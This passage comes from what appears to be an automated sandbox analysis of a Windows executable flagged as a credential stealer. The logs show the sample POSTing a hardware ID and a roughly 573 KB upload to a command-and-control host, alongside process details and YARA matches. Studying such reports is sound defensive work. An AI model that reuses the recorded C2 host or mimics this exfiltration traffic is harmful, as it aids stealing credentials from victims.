                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 1286
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:22 UTC1286OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 36 42 41 43 35 39 32 43 34 39 39 32 43 39 44 46 41 46 32 45 46 37 30 34 41 32 43 37 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:22 UTC808INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=uaicjeoiojqb22t7kahfm46d6b; expires=Sun, 17-Nov-2024 22:19:01 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iweAvyIemaEeFKXqOkfOrbeISRSJ9YKtUt6wb6fOmmzpXHZt3FBfSMSqE8K8oWpmrUNQ8LJkUy1NdjjaynfLcQ5AKP8ZulBaDLfvOH7msDkKvSjP4wKvr%2F8vaF41Ub5WVv3MN%2BRETTbsWTs%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cfc28a22365-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:22 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.549710188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:23 UTC291OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 572993
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 36 42 41 43 35 39 32 43 34 39 39 32 43 39 44 46 41 46 32 45 46 37 30 34 41 32 43 37 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:23 UTC15331OUTData Raw: c4 b2 3b dc d0 cf e5 ad 87 cb a5 c0 44 13 b5 aa fd 01 fd c1 6d f6 46 56 e1 e6 ca b5 9c e1 b0 ce 49 16 f9 df ea 8d f5 5c 21 b9 92 96 db 00 05 e1 d4 40 51 46 c2 09 a7 54 7c b6 16 f4 4a f6 c3 29 60 d9 a1 04 0f d4 e8 71 e6 0c 87 5e fd 66 13 81 2c 59 e4 5a b5 c7 32 99 6b 22 3f 55 b1 a7 f2 b3 69 83 c2 01 e2 e2 77 1d ba 3e b4 05 ce 71 c0 f7 86 9c ab 13 7b 2c 2a 13 11 46 e4 4b 08 3d 9f 39 47 e2 90 15 a3 e1 d0 48 e6 b0 bf d3 03 34 d5 94 da df 18 f8 f7 7b a6 ec c6 f6 de 61 21 9a 3e 18 27 6d c3 9c 96 a6 fc 75 68 6d c3 55 0c d4 61 93 5b 36 7b 2e 1f 87 03 e5 d6 7f a9 d2 3e a0 68 d3 b2 35 0b 43 94 dc 53 48 e8 b0 0b 59 29 b5 d8 e4 2f bf 55 72 5c ca f0 b5 8a b4 73 8c e6 40 40 c8 bf 79 43 f4 01 cc 31 7c 78 c0 20 3a fc 1c e9 df 44 6b 15 76 fb 9c 05 1c dd 05 f3 84 04 d7 24
                      Data Ascii: ;DmFVI\!@QFT|J)`q^f,YZ2k"?Uiw>q{,*FK=9GH4{a!>'muhmUa[6{.>h5CSHY)/Ur\s@@yC1|x :Dkv$
                      2024-07-25 04:32:23 UTC15331OUTData Raw: ba ee 81 ce 4f 55 ce 16 73 8a ba ad 33 7f 7e c4 18 33 a5 c2 93 af 59 65 1f a5 11 b8 9c 35 95 29 97 26 1b 87 b0 2d b3 85 97 0a 9c a6 23 e4 35 56 a7 8d 06 b3 7f d7 a8 ae 52 30 45 5a 9b 63 52 f5 e7 96 2a b8 15 9f fc 79 c1 7b 0e 86 4d 75 8b 51 9c 1f 8a eb f1 9d 0e d6 0c 2e 57 fa 3e ac 58 29 76 2a 3b 7f bd ea 47 df 8d cf 6a d3 49 35 6b 6f 83 19 23 aa 25 01 e3 f3 cf 21 ce 17 7f 7e 9d 83 f6 86 be 7f 6d 51 7a d9 29 2b 23 6d b8 86 9c 16 78 77 bd b9 c5 50 ac ba d9 ec 85 bc f1 ee 89 b5 84 e1 a1 8d 20 ba a8 66 07 8e a2 7e e5 54 48 4b 3f 37 97 31 63 cc fc 08 78 c1 73 bd 24 ac d2 4a 8e e8 d6 4f d3 5f 56 4a 77 6f ff ce 74 3a 2d 32 df 4f 0e 3b c6 54 77 6b 82 68 9b 0e 12 8c 1d 1d f5 da 0a 8c fc b4 e7 1b 53 ae 50 c3 46 98 4c 06 c2 e7 77 6e 2e de 7b 00 32 4c cb 07 61 96 26
                      Data Ascii: OUs3~3Ye5)&-#5VR0EZcR*y{MuQ.W>X)v*;GjI5ko#%!~mQz)+#mxwP f~THK?71cxs$JO_VJwot:-2O;TwkhSPFLwn.{2La&
                      2024-07-25 04:32:23 UTC15331OUTData Raw: c7 50 de fd c0 fa e4 f2 3d e7 97 db ae 55 78 7f ba fb 9a 9d 32 bc f2 21 3b 75 8a cc 3f 30 f4 62 78 80 35 00 31 de ad 8a 77 cc ce f8 2a 6c 91 db 37 4e 6c 31 76 c6 a5 3f ec a8 6a 4f f8 1d 2e 5b 78 73 a1 69 50 bd bd b7 22 a5 74 de f5 d5 a2 ef c8 da 64 d3 f5 cd 61 97 41 98 de 56 b1 44 d3 e0 8c bd dd 2c 64 d5 0d db 3d 3e 72 3a 74 6f e1 a6 6a 47 af e6 f7 e3 bd 44 29 09 72 3c ef a7 8a af 35 76 a7 37 cf ec 16 bc ac 19 19 4c 5e b5 9c f2 ce 3b 35 89 fd 22 ee 9f ed 58 ef 59 2f ae 9a c9 67 48 55 99 6a f8 9d 56 3f 94 39 f7 9c b0 47 a8 da a5 df 43 77 3d 95 87 ef 79 f5 ea ab 51 bb e9 cd 93 86 0f 00 75 46 43 16 21 0c f0 c9 c1 ae ad 27 2b 54 af 7d 96 f9 05 6d bb f9 3b 7e 0b 7c 92 a4 bb 7c e3 b8 5b db 9c d3 4f 11 52 e1 ce d9 b3 03 d1 4f 0a ec be a7 06 a8 30 95 99 6d dc b9
                      Data Ascii: P=Ux2!;u?0bx51w*l7Nl1v?jO.[xsiP"tdaAVD,d=>r:tojGD)r<5v7L^;5"XY/gHUjV?9GCw=yQuFC!'+T}m;~||[ORO0m
                      2024-07-25 04:32:23 UTC15331OUTData Raw: 26 82 84 b3 c4 e7 21 6a 1b d9 ab 30 cf f8 65 7b aa ae 50 68 fb 90 a9 28 7e d1 e5 84 b5 1c 47 3b dc 46 f4 9a 04 f9 3c 97 e5 d6 77 3d 6d 65 48 72 ee 4e 13 09 8b 98 c0 7c 74 4c f8 49 1a 96 bf c0 03 d5 e0 c0 85 66 d1 97 4c a7 c9 dd be ac bc 94 ad 1e 91 3d cf 9f db 8b 38 8f 7f 75 31 5e 05 2a f8 4e 9f ca f0 77 32 19 98 cf c8 a0 6e 5e 6b 14 42 5c ae 5b 83 19 c2 e7 8e ea 0f e6 da 9c 9a e9 10 a7 94 36 39 15 ae c1 7f 9f 26 c6 f2 c7 ff 1d ae 97 e0 41 01 33 1e 13 0e 15 db 70 f0 e9 ee 9b 66 2c 18 22 db 8f 5a 1f 71 42 0b 6e 7f 98 29 51 b8 ad 65 e6 7f 4c c2 3e 60 df ff 99 ae fe 98 4a 5c c4 3e 35 e3 78 be d2 eb 0c 88 7e 21 91 f2 7f db ed ff 73 d8 90 fc 3b 37 2a 0e 90 ee fc 9d 09 c3 bf f9 0b e3 31 3c 58 e3 3e 01 5d 01 ce 93 2c 01 98 d1 c9 85 9a bd 60 6a 80 1c cc d5 5c 2f
                      Data Ascii: &!j0e{Ph(~G;F<w=meHrN|tLIfL=8u1^*Nw2n^kB\[69&A3pf,"ZqBn)QeL>`J\>5x~!s;7*1<X>],`j\/
                      2024-07-25 04:32:23 UTC15331OUTData Raw: 23 49 b1 34 52 90 87 3d a1 71 27 b1 f0 dc 7f 93 d4 1a ec 84 22 82 cb a5 1a 0e 49 b4 04 10 76 dd f2 cf f2 93 bf 24 ec 5a dd dd 75 ec d1 4f d9 7f 5f 51 74 b7 08 c2 31 65 98 5d 45 06 b6 43 d1 aa 00 d2 f8 15 86 75 f3 ff a9 30 62 e7 fe 0d 65 4c af b2 e2 d7 50 ae 8b e3 2b 3d 94 3a 1d b7 71 3d 44 fb 48 9b 25 94 e9 27 8a 92 19 1d d2 36 4b 4f 2d 71 59 97 de 3f f9 03 af 21 0f cf a5 36 c2 1e 41 59 ea 78 e8 62 7c 87 1b 08 6c a3 31 49 ec 41 12 99 cc 8a 34 65 fc 8b 06 85 d7 71 30 95 3b 6b fb 34 7d 9e 75 5e 00 14 b9 fb 40 0a 21 bb 90 1e 19 36 f3 a3 c3 05 d0 f7 02 f0 43 aa 18 07 3b df 43 42 a1 84 fd 58 f8 65 9e 54 f8 e7 8d ed 50 7b ec 50 e7 d9 38 ac c6 79 09 b7 d9 4e f6 04 a0 f0 95 e9 77 6e 8e 08 ef 3d da 30 90 6f 5c f7 70 2a 8f bb 74 9d 67 8e 3d 90 f6 f4 4e 2d 33 5f be
                      Data Ascii: #I4R=q'"Iv$ZuO_Qt1e]ECu0beLP+=:q=DH%'6KO-qY?!6AYxb|l1IA4eq0;k4}u^@!6C;CBXeTP{P8yNwn=0o\p*tg=N-3_
                      2024-07-25 04:32:23 UTC15331OUTData Raw: 46 27 1d e0 45 6e 46 d9 2f 2b 7e a0 82 17 d3 b6 c5 09 c4 9f d0 c0 ef c3 03 6d 6f fb 5d ba 22 09 ea 7a 72 a7 54 0d 52 2b f8 e7 03 c8 c5 22 1f e9 9b 11 cc 77 19 75 1f ba 0e cb 69 df 26 f4 f2 83 02 00 c5 4a 83 eb 22 e6 39 4d 8f b7 ef c0 db 84 c0 74 b8 81 74 02 60 3c 40 d1 1b b7 a7 35 a8 40 94 7c cc af 68 b1 7e 83 e1 11 ef 40 88 22 82 b9 cc 1b 37 b0 fe 7a ef bf 35 30 1c 15 b1 8f 70 07 22 16 ed a0 f4 ea 4a 84 d7 9e b6 83 33 06 2c e9 99 1e d8 57 27 f5 8a ef 2e a8 8b 89 5c 98 d8 be 28 5c 84 61 25 96 da 7e 50 18 13 73 15 ea 47 e4 1b d2 3c 18 78 5f 2c 71 71 a3 20 c9 e0 c9 63 b6 9b 7c 68 d0 67 85 2b a5 ec 62 e7 09 dc 52 28 a0 25 58 8c 6d a5 ec 85 8b fd 8d be 7e 6e 92 a6 f9 cf 65 22 8f 27 af d0 89 b8 f3 48 b3 d1 da d0 02 b3 02 00 c3 4a f3 eb 30 51 40 c5 a4 87 ab 02
                      Data Ascii: F'EnF/+~mo]"zrTR+"wui&J"9Mtt`<@5@|h~@"7z50p"J3,W'.\(\a%~PsG<x_,qq c|hg+bR(%Xm~ne"'HJ0Q@
                      2024-07-25 04:32:23 UTC15331OUTData Raw: 72 44 5c b7 6e 90 0d a3 63 31 b1 e9 82 71 5b 0f cf a8 71 b5 37 9d ff 96 a3 be bb 7c e6 e4 ff 87 a9 3f 0f 84 aa 0f ff ff f1 d7 99 dd 3e f6 dd 0c da 14 51 92 25 cc a0 e2 6e a3 54 94 6d a4 50 c4 c8 be ce b1 ab 84 ee bb a2 22 a4 a2 08 25 42 96 41 d1 9d bd 84 2c 19 d9 f7 7d 67 e6 77 dc ef f7 fb fb f9 fd 83 0a d3 9c f3 7a 5d d7 f5 7c 3c 5f e7 ba bc 31 97 a2 1f 56 a3 98 06 d4 0a 2b 61 33 65 5d cd b7 fd 98 01 cf 87 32 fc 01 69 c2 8e fc 67 70 c0 84 76 50 8f 53 7e 7e ef f5 a4 9a 18 d7 98 89 67 c9 06 fb 22 33 03 e2 59 31 23 72 39 f2 f3 d2 57 1e c7 b4 2a 3c e7 22 d4 f7 f5 8f c9 b5 4f fa bf c8 0e 72 b3 1f 46 29 0b 03 79 85 ea d3 fb ab ce e2 60 f8 81 d7 7a ca 83 23 c0 68 62 ee 98 76 43 83 fd 79 38 dc 22 a2 af db ab f2 71 2e 73 76 a5 e6 b4 fa fb 3e 17 f9 d2 6e e0 04 f1
                      Data Ascii: rD\nc1q[q7|?>Q%nTmP"%BA,}gwz]|<_1V+a3e]2igpvPS~~g"3Y1#r9W*<"OrF)y`z#hbvCy8"q.sv>n
                      2024-07-25 04:32:23 UTC15331OUTData Raw: da da 1b ed 89 a2 a6 40 ce 29 f0 e3 93 b3 b9 a8 c5 93 10 93 b5 58 d3 9c f0 09 70 71 6e a4 ae da 24 cf 64 c2 a6 dd b0 b9 4a d5 e5 1d 86 2b 76 31 6b c3 58 72 2c bb 7a ed 23 5e ff 88 ef e0 4b c7 e5 b3 af e7 e3 21 f5 23 66 f2 e4 99 6e c4 bf e0 9d 97 8d e5 ee 5e ea 44 f5 6c a7 90 e2 7d 68 66 0a 9f f4 ff 63 13 f5 55 bf 8f 67 a4 0c 60 06 df 7d 7b 4e 94 73 72 df 9f c5 85 fa be 53 cb d7 d3 48 fe 62 b2 36 c6 db 87 76 58 73 36 05 d1 4f 0d 42 d6 c5 35 2e 81 74 3c 0a 73 dc 89 25 2a ad de 2a ab e5 69 24 c8 f6 bf e0 89 c4 96 ab 78 38 ef c3 79 ed d5 89 ff 5a cb 5b 01 4b f4 8b 6e 2e 40 cc 6f 46 2c fe 27 2a eb 69 13 79 a2 e0 54 55 25 41 68 41 88 68 48 79 86 c6 6d b7 8c 3e d3 ca 15 93 34 73 3b 3e ba 5a 40 66 0c 15 3b 91 ca c8 21 42 45 64 35 51 68 38 99 72 34 10 5a 21 33 f5
                      Data Ascii: @)Xpqn$dJ+v1kXr,z#^K!#fn^Dl}hfcUg`}{NsrSHb6vXs6OB5.t<s%**i$x8yZ[Kn.@oF,'*iyTU%AhAhHym>4s;>Z@f;!BEd5Qh8r4Z!3
                      2024-07-25 04:32:23 UTC15331OUTData Raw: f1 a9 6b 2d aa a2 bd 2a 47 03 3d 22 d4 f3 22 f7 e5 0b 03 93 87 c7 c2 54 08 ae 4f 38 75 33 67 51 a0 c4 2d d4 8e 1b 3c fa 12 fe 16 01 ac 0a 10 79 66 69 e0 19 04 8f 83 0f 80 38 a4 a0 2c 20 0f da 2e c1 62 40 68 73 67 2f 8c 02 5c d8 cc 34 da d1 e7 cc 70 b6 94 d4 ac 0b 08 d5 42 cd a7 b7 a1 17 20 15 f2 60 03 55 2c ea fc 2b 8a 50 32 83 0e 1c 69 73 73 28 0c ef ec cc 67 4a 84 36 9c 02 98 4a bb f8 93 ef e0 8c 8c 76 eb b7 c2 21 6c 29 33 35 66 55 c6 dd ef 59 aa 80 dc cc c5 a9 46 24 cf 42 dc b7 cb 61 f8 fc 67 e2 41 2d 53 db 0f 60 86 46 30 5c 09 fc 4d d4 c7 90 65 73 2f e3 da 5c df 03 b4 d9 c8 96 e0 f4 f5 56 e3 c7 ab fc 40 1f ae d4 8b 0b d9 41 d5 ab a6 1c 0f f5 10 20 27 9c b5 9f ac 93 93 51 27 16 2b dc 01 09 fc 4c de 9e 6b 71 95 a1 46 24 6e e3 67 0e b2 d3 54 1e a0 81 3a
                      Data Ascii: k-*G=""TO8u3gQ-<yfi8, .b@hsg/\4pB `U,+P2iss(gJ6Jv!l)35fUYF$BagA-S`F0\Mes/\V@A 'Q'+LkqF$ngT:
                      2024-07-25 04:32:27 UTC812INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=0rrjfgsl3nl6rtgafqcoabrpa7; expires=Sun, 17-Nov-2024 22:19:04 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfrM2rxIwhQKT%2B9vYy5QyQ5RYO1uuPOkWSNEDxeDZiXDhwNgYNuHHBGm5Tmwv7WfbyxF3KW5%2FV%2FaIN38jnQc%2BjnUFdCFlzb4ObzPTTA9SNHKKPCVJx2Adblp6fpdbvNOTw1OA51KH6R5L1Y%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896d052f059dff-EWR
                      alt-svc: h3=":443"; ma=86400


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:00:32:11
                      Start date:25/07/2024
                      Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe"
                      Imagebase:0xaa0000
                      File size:6'602'847 bytes
                      MD5 hash:A2860DB7149C32113AE0E57F4B3AB327
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      No disassembly